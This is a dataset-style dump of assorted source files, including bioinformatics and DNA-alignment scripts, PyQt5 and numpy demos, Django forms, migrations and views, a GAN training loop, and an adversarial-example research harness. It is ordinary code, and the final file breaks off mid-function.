index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
994,900 | e4b6b219c8d3d0d454dc0bb3e30d1ee3ecb7b0f5 | #!/usr/bin/env python3
"""
Usage: python day2-lunch-2.py fly_mapping.txt ~/data/results/stringtie/SRR072893/t_data.ctab ignore

Replace FlyBase transcript IDs (column 9 of a stringtie t_data.ctab file)
with UniProt IDs using a two-column mapping file.  The third argument
decides what happens when no mapping exists: "ignore" drops the row,
anything else substitutes "." for the ID.  Output is capped at 100 rows.
"""
# Import libraries
import sys

# Behaviour for unmapped FlyBase IDs ("ignore" skips the row entirely).
translation_arg = sys.argv[3]

# Build the FlyBase ID -> UniProt ID lookup from the mapping file.
# (Files are opened with `with` so they are closed even on error.)
fly_mapping = {}
with open(sys.argv[1]) as mapping:
    for line in mapping:
        fields = line.split()
        fly_mapping[fields[0]] = fields[1]

with open(sys.argv[2]) as c_tab, open("id_mapping_ignore.txt", "w") as output:
    # Use the same header for the output file as from the original c_tab file.
    output.write(c_tab.readline())
    counter = 0  # limits the output to 100 data lines
    for data in c_tab:
        if counter == 100:
            break
        fields = data.split()
        c_tab_id = fields[8]  # column 9 holds the FlyBase transcript ID
        if c_tab_id in fly_mapping:
            # Replace the FlyBase ID with its UniProt translation.
            fields[8] = fly_mapping[c_tab_id]
        elif translation_arg == "ignore":
            continue  # no mapping: drop this row
        else:
            fields[8] = "."  # no mapping: substitute the default value
        output.write("\t".join(fields) + "\n")
        counter += 1
|
994,901 | f510bf1efbd1a53e79c34d35744a92b2c0bd6629 | """
@Time : 2021/5/16 11:30
@Author : ZHC
@FileName: numpy_demo.py
@Software: PyCharm
"""
import numpy as np
# Build a 3x3 matrix of 0..8 and a scaled copy to demonstrate stacking.
a = np.arange(9).reshape(3, 3)
print(a)
print()
b = 2 * a
print(b)
# Horizontal stack: columns of a followed by columns of b (3x6 result).
print("水平组合 ",np.hstack((a,b)))
print()
# concatenate along axis=1 is equivalent to hstack for 2-D arrays.
print("用concatenate函数来实现同样",np.concatenate((a,b),axis=1))
994,902 | 4b89b05a60ff637a0de46b05c7567f86d4c24c49 | class Symbol(object):
def __init__(self, name):
self.name = name
def __str__(self):
return self.name
def __repr__(self):
return "Symbol(%r)" % self.name
def isSymbol(v):
return isinstance(v, Symbol)
def symbol(name, syms={}):
    """Intern `name`: every call with the same name yields the same Symbol.

    The mutable default dict is intentional - it is the interning table
    shared across calls.
    """
    if name not in syms:
        syms[name] = Symbol(name)
    return syms[name]
class Unique(object):
def __init__(self, name):
self.name = name
def __repr__(self):
return "<unique: %s>" % self.name
def isUnique(v):
return isinstance(v, Unique)
null = Unique("()")
true = Unique("true")
false = Unique("false")
def make_tuple(length):
if length == 0:
return null
return [null]*length
# Tuples are modelled as plain Python lists; the empty tuple is the
# singleton `null` so it can be compared by identity.
def isTuple(v):
    return isinstance(v, list)
def tuple_length(a):
    return len(a)
def tuple_get(a, i):
    return a[i]
def tuple_set(a, i, v):
    a[i] = v
def tuple_(*args): # shortcut for use in interpreter
    return list(args)
def make_typed(t, v):
return tuple_(t, v)
def isType(t, v):
if isTuple(v):
return t == typed_tag(v)
return False
def typed_tag(t):
return tuple_get(t, 0)
def typed_value(t):
return tuple_get(t, 1)
# A pair is a typed node: [pairTag, [head, tail]].
pairTag = Unique("pair")
def pair(x, y):
    return make_typed(pairTag, tuple_(x, y))
def isPair(v):
    return isType(pairTag, v)
def pair_head(p):
    # unwrap the tag with typed_value, then take slot 0 of the payload
    return tuple_get(typed_value(p), 0)
def pair_tail(p):
    return tuple_get(typed_value(p), 1)
# An application node: [appTag, [proc, arg]].
appTag = Unique("app")
def app(f, x):
    return make_typed(appTag, tuple_(f, x))
def isApp(v):
    return isType(appTag, v)
def app_proc(a):
    """Return the procedure component of an app node.

    Bug fix: an app node is [appTag, [proc, arg]], so the payload must be
    unwrapped with typed_value first (mirroring pair_head/pair_tail).
    tuple_get(a, 0) returned the appTag itself, not the procedure.
    """
    return tuple_get(typed_value(a), 0)
def app_arg(a):
    """Return the argument component of an app node (see app_proc)."""
    return tuple_get(typed_value(a), 1)
primTag = Unique("prim")
def makePrim(p):
return make_typed(primTag, p)
def isPrim(v):
return isType(primTag, v)
macroTag = Unique("macro")
def makeMacro(m):
return make_typed(macroTag, m)
def isMacro(v):
return isType(macroTag, v)
|
994,903 | d917546acc4b4729634e50b3fda27825048466aa | # Face Recognition learnt form indian
# 2017-04-02 19:20:31
# Capture ~21 face crops from the default webcam and save them as
# grayscale JPEGs under dataSet/ for later recognizer training.
import cv2
import numpy as np
# Haar cascade for frontal faces; the XML file must sit next to this script.
face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
cap = cv2.VideoCapture(0)
# using your own camera
userId = input('Please enter the user id: ')
sampleNum = 0  # number of face samples captured so far
while True:
    # NOTE(review): ret is never checked; a failed grab would crash cvtColor.
    ret, img = cap.read()
    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
    faces = face_cascade.detectMultiScale(gray)
    for (x, y, w, h) in faces:
        # Save the grayscale face crop as dataSet/User.<id>.<n>.jpg
        cv2.imwrite('dataSet/User.' + str(userId) + '.' + str(sampleNum) + '.jpg',\
            gray[y:y+h, x:x+w])
        # Draw a green box around the detected face in the preview window.
        cv2.rectangle(img, (x,y), (x+w, y+h), (0, 255, 0), 2)
        cv2.waitKey(100)  # brief pause between captures
        sampleNum += 1
    cv2.imshow('iamge', img)
    k = cv2.waitKey(30) & 0xff  # keeps the preview responsive (k is unused)
    if sampleNum > 20:
        break
cap.release()
cv2.destroyAllWindows()
|
994,904 | eedf55bbaad7883952c64d1da9a814d467eebaa4 | #
# @lc app=leetcode id=520 lang=python3
#
# [520] Detect Capital
#
class Solution:
    """LeetCode 520 - Detect Capital.

    Capital usage is valid when the word is ALL CAPS, all lower case,
    or Capitalized (only the first letter upper case).
    """
    def exceptUpper(self, word: str) -> bool:
        """Return True if no character of `word` is lower case.

        Replaces the original per-character recursion, which sliced the
        string each call (O(n^2)) and hit RecursionError on long words.
        """
        return not any(c.islower() for c in word)
    def exceptLower(self, word: str) -> bool:
        """Return True if no character of `word` is upper case."""
        return not any(c.isupper() for c in word)
    def detectCapitalUse(self, word: str) -> bool:
        """Return True when capitals are used correctly in `word`."""
        if word[0].isupper():
            # ALL CAPS or Capitalized: the rest must be uniform.
            return self.exceptUpper(word[1:]) or self.exceptLower(word[1:])
        else:
            # First letter lower: nothing else may be upper case.
            return self.exceptLower(word[1:])
|
994,905 | 3ce01a7ae33836d4de4e651dc9c6de037f304d0d | #!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
ZetCode PyQt5 tutorial
In this example, we create a simple
window in PyQt5.
author: Jan Bodnar
website: zetcode.com
last edited: January 2015
"""
import sys
from PyQt5.QtWidgets import (QWidget, QToolTip, QPushButton, QApplication, QMessageBox, QDesktopWidget)
from PyQt5.QtGui import QIcon # For the icon
from PyQt5.QtGui import QFont # For the tooltip font
from PyQt5.QtCore import QCoreApplication # For quit button
class Example(QWidget): #The Example class inherits from the QWidget class.
    """Demo window: tooltips, a quit button, centered geometry, confirm-on-close."""
    def __init__(self):
        super().__init__()
        self.initUI()
    def initUI(self):
        """Build the widgets and show the window."""
        # Tooltip font must be set before any tooltip text is assigned.
        QToolTip.setFont(QFont('SansSerif', 10))
        self.setToolTip('This is a <b>QWidget</b> widget')
        btn = QPushButton('Button', self)
        btn.setToolTip('This is a <b>QPushButton</b> widget')
        btn.resize(btn.sizeHint())  # sizeHint() gives the recommended size
        btn.move(50, 50)
        # First ctor argument is the label, second is the parent widget.
        qbtn = QPushButton('Quit', self)
        # Signal/slot: the clicked signal is connected to the application's
        # quit() slot, terminating the main event loop.
        qbtn.clicked.connect(QCoreApplication.instance().quit)
        qbtn.resize(qbtn.sizeHint())
        qbtn.move(200, 50)
        self.resize(500, 500)
        self.center()
        self.setWindowTitle('Tooltips')
        self.show()
    def center(self):
        """Center the window on the available screen area."""
        qr = self.frameGeometry()  # rectangle describing the window geometry
        cp = QDesktopWidget().availableGeometry().center()  # screen center point
        qr.moveCenter(cp)  # keep the size, recenter the rectangle on screen
        self.move(qr.topLeft())  # snap the window onto the relocated rectangle
    # closeEvent is overridden to confirm before closing via a QMessageBox.
    def closeEvent(self, event):
        """Ask for confirmation; accept or ignore the close accordingly."""
        reply = QMessageBox.question(self, 'Message',
            "Are you sure to quit?", QMessageBox.Yes | QMessageBox.No , QMessageBox.Yes)
        if reply == QMessageBox.Yes:
            event.accept()
        else:
            event.ignore()
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = Example()
sys.exit(app.exec_()) #The exec_() method has an underscore. It is because the exec is a Python keyword. And thus, exec_() was used instead. |
994,906 | e667226f2272727862799c5fa382ec31ea70700b | # staff
from staff_models.staffs.class_admins.staff_admin import StaffAdmin
# staff phone
from staff_models.staffs.class_admins.staff_phone_admin import *
# staff address
from staff_models.staffs.class_admins.staff_address_admin import *
|
994,907 | 4b7c0cfa3a96eec448f0f89fbd6ede1f5381ce33 | #função calcula velocidade media
def calcula_velocidade_media(km, h):
    """Return the average speed: distance `km` divided by time `h`."""
    return km / h
vm = calcula_velocidade_media(12,5)
print(vm) |
994,908 | 38a51b0e0c92c27bb3926320f625b2cabae5940d | from django import forms
class LoginForm(forms.Form):
    """Credentials form; the password input is masked."""
    username = forms.CharField(max_length=32)
    password = forms.CharField(widget=forms.PasswordInput)
class NewblogpostsForm(forms.Form):
    """New blog post; the body is optional free text."""
    title = forms.CharField(max_length=50)
    body = forms.CharField(widget=forms.Textarea, required=False)
class CommentForm(forms.Form):
    """Reader comment with a fixed-size (30x4) textarea."""
    name = forms.CharField(max_length=32)
    comment = forms.CharField(widget=forms.Textarea(attrs={'cols': 30, 'rows': 4}))
|
994,909 | 47c9a6748420de8ff04908c36c53e02ac18d20d1 | '''
Init
'''
from .package_name import var
|
994,910 | 2e1a979afdd3d99f064d91c2445b8385c5336462 | import sys
import os
from adv.fgsm import FGSM
from adv.jsma import JSMA
from utils import load_data_for_adv, load_pretrain_model, evl_index_for_adv
from config import *
map_attackers = {
'fgsm': FGSM,
'jsma': JSMA,
}
def adv_attack(model, data_loader, max_bit, alg):
    """Run the chosen adversarial attack over positively-labelled samples.

    Args:
        model: pretrained classifier under attack.
        data_loader: iterable yielding (x, y) pairs.
        max_bit: perturbation budget forwarded to the attacker.
        alg: key into map_attackers ('fgsm' or 'jsma').

    Returns:
        list of per-sample result codes from attacker.attack.
    """
    attacker = map_attackers[alg](model, max_bit)
    iter = 0  # NOTE(review): shadows the builtin `iter`; only used by the debug cap below
    r_codes = []
    for x, y in data_loader:
        # Only attack samples labelled 1 - presumably the positive/malicious
        # class; confirm against the dataset's label convention.
        if y.item() == 1:
            r_code, adv_x = attacker.attack(x, y)
            r_codes.append(r_code)
        iter += 1
        # if iter > 5:
        #     break
    evl_index_for_adv(r_codes, alg)
    return r_codes
def worker(args):
    """Attack one pretrained model with one (alg, max_bit) setting.

    Args:
        args: tuple (alg, max_bit, model_file) - packed so the function can
            be dispatched through multiprocessing Pool.map.

    Returns:
        dict report holding the settings and per-sample result codes.
    """
    alg, max_bit, model_file = args
    model = load_pretrain_model(model_file)
    # data_dir comes from `config` via the star import at the top of the file.
    data_loader = load_data_for_adv(os.path.join(data_dir, 'baseline_dataset.pkl'))
    print("=============attack algorithm:{} max_bit:{} ======START=========".format(alg, max_bit))
    r_codes = adv_attack(model, data_loader, max_bit, alg)
    report = {
        'alg': alg,
        'max_bit': max_bit,
        'model_file': model_file,
        'r_codes': r_codes,
    }
    print("=============attack algorithm:{} max_bit:{} ======END=========".format(alg, max_bit))
    return report
if __name__ == '__main__':
commands = []
target_models = list(map(lambda x: os.path.join(model_save_dir, x), os.listdir(model_save_dir)))
print(target_models)
for target_model_file in target_models:
for max_bit in [10,20,30,40]:
commands.append(('fgsm', max_bit, target_model_file))
commands.append(('jsma', max_bit, target_model_file))
print(commands)
print(len(commands))
import multiprocessing as mp
pool = mp.Pool(processes=6)
rets = pool.map(worker, commands)
# import json
# with open('attack.logger.json', 'w') as f:
# json.dump(rets, f, indent=4)
|
994,911 | 134942fb800169515e9cc0b73c464a1bf6d32703 | # Generated by Django 3.1 on 2020-10-17 13:51
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('school', '0017_auto_20201002_1752'),
]
operations = [
migrations.CreateModel(
name='Enroll',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('name', models.CharField(max_length=64, verbose_name='姓名')),
('phone', models.CharField(max_length=20, verbose_name='手机号')),
('create_time', models.DateTimeField(auto_now_add=True, verbose_name='创建时间')),
('course', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='school.course', verbose_name='课程')),
('school', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='school.school', verbose_name='学校')),
],
),
]
|
994,912 | 4b46a45a58755323a763a3032907c904613d019d | '''Given the names and grades for each
and print the name(s) of any student(s)
Note: If there are multiple students with the same grade, order their names alphabetically and print each
name on a new line.
Input Format
The first line contains an integer,
The subsequent lines describe
the second line contains their grade.
Constraints
There will always be one or more
Output Format
Print the name(s) of any student(s) having the second lowest grade in Physics; if there are multiple
students, order their names alphabetically
'''
"""Read student names and grades interactively, then print the student(s)
holding the second lowest grade.  Numeric inputs are validated with retry
loops; ties are listed in name order."""
while True:
    try:
        no_of_student = int(input("Enter the number of student: "))
        break
    except ValueError:
        # Only bad numeric input should retry (was a bare `except:`).
        print("Please give a integer value")
student_score = []
for _ in range(no_of_student):
    print()
    name = input("Enter the name of the student: ")
    while True:
        try:
            score = float(input("Enter the score of the student: "))
            break
        except ValueError:
            print("please enter a numerical value")
            print("Re-enter the student details")
    student_score.append([name, score])
# Alphabetical listing by name (plain loop: printing is a side effect).
orderedlist = sorted(student_score, key=lambda s: s[0])
print()
print("The order of the student according to name is :")
for entry in orderedlist:
    print(entry)
# Collect distinct scores in ascending order
# (renamed from `list`, which shadowed the builtin).
orderedscore = sorted(student_score, key=lambda s: s[1])
unique_scores = []
for entry in orderedscore:
    if entry[1] not in unique_scores:
        unique_scores.append(entry[1])
# Explicit length check instead of exception-driven control flow.
if len(unique_scores) > 1:
    second_least_number = unique_scores[1]
else:
    print("Every one has scored same grade")
    second_least_number = unique_scores[0]
print()
print("Second lowest grade student are: ")
for entry in orderedlist:
    # Compare the score field explicitly rather than membership in [name, score].
    if entry[1] == second_least_number:
        print(entry)
|
994,913 | 374f168a0ea7c7c03c06014b7ef00a6ce8cf2779 | # Generated by Django 3.0.3 on 2020-02-15 15:36
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('stock', '0002_auto_20200215_1038'),
]
operations = [
migrations.RenameField(
model_name='product',
old_name='created_by',
new_name='user',
),
]
|
994,914 | a2e95c979db988f6119a81c45047d1d3574fb73c | import airflow
from airflow import DAG
from airflow.operators.bash_operator import BashOperator
from datetime import timedelta
# DAG definition: runs a single BashOperator every 5 minutes.
default_args = {
    'retries': 1,
    'retry_delay': timedelta(minutes=5),
    # days_ago(0) = today, so the DAG becomes eligible to run immediately.
    'start_date': airflow.utils.dates.days_ago(0)
}
dag = DAG(
    'hello-world-cloud-build-test-demo-2',
    default_args=default_args,
    description='git-sync testing',
    schedule_interval=timedelta(minutes=5))
t1 = BashOperator(
    task_id='echo', bash_command='echo welcome!', dag=dag, depends_on_past=False)
|
994,915 | c21704be89cd302f26d4e2960ae9b0e0a09597b7 | """author: @pythonpips"""
name = 'PythonPips'
# str.endswith returns a bool; the result is computed but discarded here.
name.endswith('Pips')
# outputs True
994,916 | 3a66fa263660e14e51b9d1779f7c88536be6afe9 | import pandas as pd
import requests
import time
import urllib
from bs4 import BeautifulSoup
class AppURLopener(urllib.request.FancyURLopener):
    # Custom User-Agent opener; NOTE(review): defined but never used below.
    version = "Mozilla/5.0"
# Load the app list from Excel.  NOTE(review): `sep` and `encoding` are not
# read_excel parameters - confirm this pandas version silently ignores them.
data = pd.read_excel("C:\\Users\AMasanov\\Desktop\\app_20191219_112501_659194930_2751059812.xlsx", header=None, sep=';', names=['app', 'pot','uq'], encoding="ISO-8859-1")
links = data['app'].values.tolist()
links = links[1:]  # drop the header row
sort_links = []
for lin in links:
    # Keep only Android entries; extract the package id following "Android".
    if "Android" in str(lin):
        print(lin)
        word = lin.replace("(", "").replace(")", "")
        temp = word.index(str('Android'))
        # index of the character just before the next space after "Android"
        wordEndIndex = temp + word[temp:].index(' ') - 1
        sort_links.append(str('/store/apps/details?id=') +str(word[wordEndIndex + 1:].replace(" ","")))
    else:
        print(str('No Android in ') + str(lin))
print(len(sort_links))
# Write the Play Store links to CSV (column header is Russian for "Link").
table = pd.DataFrame({'Ссылка': sort_links},
    columns=["Ссылка"])
table.to_csv(str("C:\\Users\AMasanov\\Desktop\\") + '/' + str("Ссылки_андроид") + '.csv', sep=';', index=False,
    encoding='utf-8-sig')
|
994,917 | 78224bd687949145653b9e04371c473bb04aa4e2 | #!/usr/bin/env python3
# @File: person.py
# --coding:utf-8--
# @Author:Schopenhauerzhang@icloud.com(Schopenhauerzhang@gmail.com)
# @license:Copyright Schopenhauerzhang@icloud.com All rights Reserved.
# @Time: 2019-09-23 15:00
from google.protobuf import json_format
from py_protobuf.protobuf import person_pb2
import json
def get_protobuf_data():
    """
    Build a sample Person message (id=123, name="abc") and serialize it.

    Returns:
        bytes-like object: the protobuf wire-format encoding.
    """
    try:
        person = person_pb2.Person()
        person.id = 123
        person.name = "abc"
        p_res = person.SerializeToString()
    except Exception:
        raise Exception("get_protobuf_data error: fail, please check your code")
    return p_res
def protobuf2json_or_dict(is_json = True):
    """
    Convert the sample protobuf Person into JSON-compatible data.

    Args:
        is_json: bool, True returns the message parsed from its JSON
            representation; False returns a plain dict.

    Returns:
        dict/json string
    """
    try:
        persons = person_pb2.Person()
        persons.ParseFromString(get_protobuf_data())
        if is_json is True:
            result = json_format.MessageToJson(persons)
            result = json.loads(result)
        else:
            # Bug fix: the dict branch previously returned a JSON string
            # (MessageToJson); MessageToDict yields the documented dict.
            result = json_format.MessageToDict(persons)
    except Exception:
        raise Exception("protobuf2json_or_dict error: fail, please check your code")
    return result
|
994,918 | b509695e7c23bb35fb853080bf47e89c6668b76c |
from common.gps import gps_dist_matrix
print(gps_dist_matrix([[1,2], [3,4], [5,6]]))
|
994,919 | dede78ed01d5fc42783f4990fc1128a7c4de2099 | #!/usr/bin/env python3
"""Ouput the two DNA sequences with the highest number of matches, with their
number of matches, from a csv."""
__appname__ = "align_seqs.py"
__author__ = "Katie Bickerton <k.bickerton18@imperial.ac.uk>"
__version__ = "3.5.2"
__date__ = "14-Oct-2018"
import sys
#import csv module to allow csv files to be read/written
import csv
#reads csv
with open('../Data/seqs.csv','r') as f:
csvread = csv.reader(f)
# create a list of sequences
sourcedata = [x[0] for x in csvread]
#set the two sequences required
seq1 = sourcedata[0]
seq2 = sourcedata[1]
# # Two example sequences to match
## If inputting sequences manually:
#seq2 = "ATCGCCGGATTACGGG"
#seq1 = "CAATTCGGAT"
# Assign the longer sequence s1, and the shorter to s2
# l1 is length of the longest, l2 that of the shortest
# calculates length of both sequences
l1 = len(seq1)
l2 = len(seq2)
# finds the longer sequence and assigns to s1
if l1 >= l2:
s1 = seq1
s2 = seq2
else:
s1 = seq2
s2 = seq1
l1, l2 = l2, l1 # swap the two lengths
# A function that computes a score by returning the number of matches starting
# from arbitrary startpoint (chosen by user)
def calculate_score(s1, s2, l1, l2, startpoint):
    """Count base matches of s2 laid over s1 at the given offset.

    Prints the alignment (``*`` match / ``-`` mismatch), both sequences,
    and the score, then returns the number of matching bases.
    """
    alignment_marks = []  # one mark per compared position
    total = 0
    for offset in range(l2):
        pos = offset + startpoint
        if pos >= l1:
            continue  # s2 hangs off the end of s1: nothing to compare
        if s1[pos] == s2[offset]:
            alignment_marks.append("*")
            total += 1
        else:
            alignment_marks.append("-")
    matched = "".join(alignment_marks)
    # Show the overlap, s2 shifted under s1, and the score for this offset.
    print("." * startpoint + matched)
    print("." * startpoint + s2)
    print(s1)
    print(total)
    print(" ")
    return total
# Test the function with some example starting points:
# calculate_score(s1, s2, l1, l2, 0)
# calculate_score(s1, s2, l1, l2, 1)
# calculate_score(s1, s2, l1, l2, 5)
# now try to find the best match (highest score) for the two sequences
# setting start values:
my_best_align = None
my_best_score = -1
for i in range(l1): # Note that you just take the last alignment with the highest score
z = calculate_score(s1, s2, l1, l2, i)
if z > my_best_score:
# best align is position of starting point of s2 relative to s1, with the most matches
my_best_align = "." * i + s2
my_best_score = z
print(my_best_align)
print(s1)
print("Best score:", my_best_score)
# create an output string of alignment, sequence and best score
outstr = "{}\n{}\nBest score: {}".format(my_best_align, s1, my_best_score)
# write string to text file
with open("../Results/best_score.txt", "w") as f:
f.write(outstr) |
994,920 | 78ec741487c1f204c83599e0a474cacfd70af152 | import torch
import argparse
# import yaml
# import yaml_utils
from tqdm import tqdm
import torch
import torch.nn as nn
import torch.optim as optim
from torchvision import datasets, transforms,utils
from torch.utils.data import DataLoader
from gen_models_pytorch.gen_res_32 import Generator32
from dis_models_pytorch.dis_res_32 import Discriminator32
import torchvision
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--batch_size', type=int, default=64)
parser.add_argument('--lr', type=float, default=1e-5)
parser.add_argument('--loss', type=str, default='hinge')
parser.add_argument('--checkpoint_dir', type=str, default='checkpoints')
parser.add_argument('--model', type=str, default='resnet')
parser.add_argument('--path', type=str, default=r"H:\Dataset") #flower_path = r'H:\Dataset\flowers17\train'
# parser.add_argument('--batch', type=int, default=8)
parser.add_argument('--iter', type=int, default=200000)
parser.add_argument('--n_class', type=int, default=10)
args = parser.parse_args()
dataset = iter(sample_data(args.path, args.batch_size))
Z_dim = 128
# number of updates to discriminator for every update to generator
disc_iters = 3
discriminator = Discriminator32(n_class=args.n_class).to(device)
generator = Generator32(Z_dim,n_class=args.n_class).to(device)
# because the spectral normalization module creates parameters that don't require gradients (u and v), we don't want to
# optimize these using sgd. We only let the optimizer operate on parameters that _do_ require gradients
# TODO: replace Parameters with buffers, which aren't returned from .parameters() method.
optim_disc = optim.Adam(discriminator.parameters(), lr=args.lr, betas=(0.0, 0.9))
optim_gen = optim.Adam(generator.parameters(), lr=6*args.lr, betas=(0.0, 0.9))
# use an exponentially decaying learning rate
scheduler_d = optim.lr_scheduler.ExponentialLR(optim_disc, gamma=0.90)
scheduler_g = optim.lr_scheduler.ExponentialLR(optim_gen, gamma=0.90)
pbar = tqdm(range(args.iter), dynamic_ncols=True)
for i in pbar:
discriminator.zero_grad()
# real_image, label = next(dataset)
# b_size = real_image.size(0)
# real_image = real_image.to(device)
# label = label.to(device)
# update discriminator
requires_grad(generator, False)
requires_grad(discriminator, True)
b_size = 0
for _ in range(disc_iters):
real_image, label = next(dataset)
real_image = real_image.repeat(1, 3, 1, 1)
real_image = real_image.to(device)
b_size = real_image.size(0)
z = torch.randn(b_size, Z_dim).to(device)
label = label.to(device)
optim_disc.zero_grad()
optim_gen.zero_grad()
# loss1 = -discriminator(real_image,label).mean()
# loss2 = discriminator(generator(z,label),label).mean()
disc_loss = -discriminator(real_image,label).mean() + discriminator(generator(z,label),label).mean()
# if args.loss == 'hinge':
# disc_loss = nn.ReLU()(1.0 - discriminator(data)).mean() + nn.ReLU()(1.0 + discriminator(generator(z))).mean()
# elif args.loss == 'wasserstein':
# disc_loss = -discriminator(data).mean() + discriminator(generator(z)).mean()
# else:
# disc_loss = nn.BCEWithLogitsLoss()(discriminator(data), Variable(torch.ones(args.batch_size, 1).cuda())) + \
# nn.BCEWithLogitsLoss()(discriminator(generator(z)), Variable(torch.zeros(args.batch_size, 1).cuda()))
disc_loss.backward()
optim_disc.step()
# optim_disc.zero_grad()
optim_gen.zero_grad()
requires_grad(generator, True)
requires_grad(discriminator,False )
z = torch.randn(b_size, Z_dim).to(device)
gen_loss = -discriminator(generator(z,label),label).mean()
gen_loss.backward()
optim_gen.step()
if i%5000 == 0:
scheduler_d.step()
scheduler_g.step()
if (i + 1) % 100 == 0:
generator.train(False)
z = torch.randn(args.n_class, Z_dim).to(device)
input_class = torch.arange(args.n_class).long().to(device)
fake_image = generator(z, input_class)
generator.train(True)
utils.save_image(
fake_image.cpu().data,
f'sample/{str(i + 1).zfill(7)}.png',
nrow=args.n_class,
normalize=True,
range=(0, 1),
)
if (i + 1) % 2000 == 0:
no = str(i + 1).zfill(7)
torch.save(generator.state_dict(), f'checkpoint/generator_{no}.pt')
torch.save(discriminator.state_dict(), f'checkpoint/discriminator_{no}.pt')
torch.save(optim_gen.state_dict(), f'checkpoint/gen_optimizer_{no}.pt')
torch.save(optim_disc.state_dict(), f'checkpoint/dis_optimizer_{no}.pt')
pbar.set_description(
(f'{i + 1}; G: {gen_loss:.5f};' f' D: {disc_loss:.5f}')
)
def sample_data(path, batch_size):
    """Yield FashionMNIST batches forever, reshuffling after each epoch.

    `transform` is the module-level preprocessing pipeline defined in this file.
    """
    # dataset = datasets.ImageFolder(path, transform=transform)
    # dataset = torchvision.datasets.STL10(path,transform=transform)
    dataset = torchvision.datasets.FashionMNIST(path,transform=transform)
    loader = DataLoader(dataset, shuffle=True, batch_size=batch_size, num_workers=4)
    loader = iter(loader)
    while True:
        try:
            yield next(loader)
        except StopIteration:
            # Epoch exhausted: rebuild the loader so iteration never stops.
            loader = DataLoader(
                dataset, shuffle=True, batch_size=batch_size, num_workers=4
            )
            loader = iter(loader)
            yield next(loader)
transform = transforms.Compose(
[
transforms.Resize((32,32)),
# transforms.CenterCrop(128),
# transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
# transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),
]
)
def requires_grad(model, flag=True):
    """Toggle gradient tracking for every parameter of `model`."""
    for tensor in model.parameters():
        tensor.requires_grad_(flag)
if __name__ == '__main__':
with torch.cuda.device(0):
main()
|
994,921 | bf6f828027e3dc12bbcd6c3a782fcb9551681930 | from django.shortcuts import render, render_to_response, redirect, RequestContext
import time
from django.db import transaction, connection
from django.http import HttpResponseRedirect, HttpResponse
from django.conf import settings
from django.conf.urls.static import static
from rbmo.models import Agency, WFPData, PerformanceTarget, CoRequest, PerformanceReport
from django.contrib.auth.models import User
from .forms import WFPForm, CORequestForm
from django.contrib.auth import authenticate, login
from django.contrib.auth.decorators import login_required, permission_required
from helpers.helpers import has_permission, get_allowed_tabs, dictfetchall
from datetime import datetime, date
SYSTEM_NAME = 'e-RBMO Data Management System'
months = ['January', 'February', 'March', 'April',
'May', 'June', 'July', 'August', 'September',
'October', 'November', 'December']
@login_required(login_url='/admin/')
def wfpForm(request):
context = RequestContext(request)
data = {'system_name':SYSTEM_NAME,
'agency_id': request.GET.get('agency_id')
}
data['allowed_tabs'] = get_allowed_tabs(request.user.id)
data['current_year'] = time.strftime('%Y')
data['form'] = WFPForm()
if request.method=='POST':
wfp_form = WFPForm(request.POST)
if wfp_form.is_valid():
saveWFPData(request, wfp_form, request.POST.get('year'), request.POST.get('agency'))
data['s_msg'] = 'WFP Entry was succesfully saved'
data['agency'] = Agency.objects.get(id=request.POST.get('agency'))
return render_to_response('./wfp/wfp_form.html', data, context)
else:
data['frm_errors'] = wfp_form.errors
data['form'] = wfp_form
return render_to_response('./wfp/wfp_form.html', data, context)
else:
try:
data['agency'] = Agency.objects.get(id=data['agency_id'])
return render_to_response('./wfp/wfp_form.html', data, context)
except Agency.DoesNotExist:
return HttpResponseRedirect('/admin/agencies')
@login_required(login_url='/admin/')
@transaction.atomic
def viewWFP(request):
context = RequestContext(request)
cursor = connection.cursor()
data = {'system_name' : SYSTEM_NAME,
'agency_id' : request.GET.get('agency_id'),
'current_year' : time.strftime('%Y'),
'agency_tab' : 'wfp',
'years' : getYears(request.GET.get('agency_id'))
}
data['allowed_tabs'] = get_allowed_tabs(request.user.id)
if request.method=='POST':
year = request.POST.get('year')
agency = Agency.objects.get(id=request.POST.get('agency_id'))
else:
year = time.strftime('%Y')
agency = Agency.objects.get(id=request.GET.get('agency_id'))
data['pss'] = getProgActs('PS', agency, year)
data['mooes'] = getProgActs('MOOE', agency, year)
data['cos'] = getProgActs('CO', agency, year)
data['year'] = year
data['agency'] = agency
return render_to_response('./wfp/agency_wfp_info.html', data, context)
def getYears(agency_id):
    """Return the distinct WFP years recorded for an agency.

    Returns a list of dicts like [{'year': ...}, ...] via dictfetchall.
    """
    cursor = connection.cursor()
    # Parameterized query: agency_id is bound by the driver, not interpolated.
    query = '''select distinct(year) from wfp_data where agency_id=%s'''
    cursor.execute(query, [agency_id])
    return dictfetchall(cursor)
def getProgActs(allocation, agency, year):
    """Group WFP activities by program for one allocation/agency/year.

    Returns:
        list of {'prog': program_name, 'acts': [{'id': ..., 'activity': ...}, ...]}
    """
    cursor = connection.cursor()
    # Distinct program names for this allocation (parameterized SQL).
    query = '''
    select distinct(program) from wfp_data
    where allocation=%s and agency_id=%s and year=%s
    '''
    cursor.execute(query, [allocation, agency.id, year])
    prog_acts = []
    maj_prog = cursor.fetchall()
    for prog in maj_prog:
        acts = []
        # prog is a 1-tuple; prog[0] is the program name.
        activities = WFPData.objects.filter(agency=agency, allocation=allocation , year=year, program=prog[0])
        for act in activities:
            acts.append({'id' : act.id,
                'activity' : act.activity
                })
        prog_acts.append({'prog' : prog[0],
            'acts' : acts
            })
    return prog_acts
@transaction.atomic
def getWFPData(request):
data = {}
context = RequestContext(request)
wfp_id = request.GET.get('wfp_id')
q_targets = []
wfp = WFPData.objects.get(id=wfp_id)
perf_targets = PerformanceTarget.objects.filter(wfp_activity=wfp.id)
for target in perf_targets:
q_targets.append({'id' : target.id,
